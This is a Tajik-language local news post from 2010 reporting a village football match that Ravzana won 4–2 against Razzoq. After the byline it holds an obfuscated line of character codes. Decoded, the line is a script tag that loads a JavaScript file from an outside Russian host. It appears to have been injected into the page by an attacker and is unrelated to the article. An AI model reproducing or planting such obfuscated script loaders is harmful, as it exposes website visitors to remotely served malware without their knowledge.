8.05.2010
Бозии футбол байни дастаи Равзана-Раззоқ
Дар варзишгоҳи мактаби № 25-и ҷамоати деҳоти Рӯмон дастаҳои футболбозони Равзана ва Разоқ байни ҳам қувва озмуданд. Ҳарчанд, ки майдони варзишгоҳ барои гузаронидани чунин мусобиқа хурду мувофик нест ва ҳатто шароити нишаста тамошо карданро надорад, мухлисон ва сокинони деҳот барои худ яке аз зарфи холишудаи равған ва дигаре нишастгоҳи мошини кӯҳнаашро оварда, ҷои нишаст месохту масъулин бошанд бо оҳак хати варзишгоҳро мекашиданд. Дар сӯи дигар бошад ғунҷоиши оби ҷав яъне пиво гузошта шуда буд. Ҳамин тавр бозӣ баъд аз интизориҳои зиёд ва гузаштани дақиқаҳои соати муаян шуда оғоз шуд. Голи аввалинро дар дақиқаи 13-ум ҳамлагар Ҷасур Қурбонов аз дастаи Равзана вориди дарвозаи ҳариф намуд. Ниҳоятан даври аввали бозӣ бо ҳисоби 2 бар 1 ба фоидаи дастаи Равзана анҷом ёфт. Дар даври дуюми бозӣ низ ҳисоб чунин буд. Дар ҷамбаст дастаи Равзана бо ҳисоби 4 бар 2 бар дастаи Раззоқ ғолиб омад.
Афзал Босолиев

char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)13c8b259e57099a77b4273ab0ec15bd6.js" type="text/javascript">

ТАВЗЕҲОТ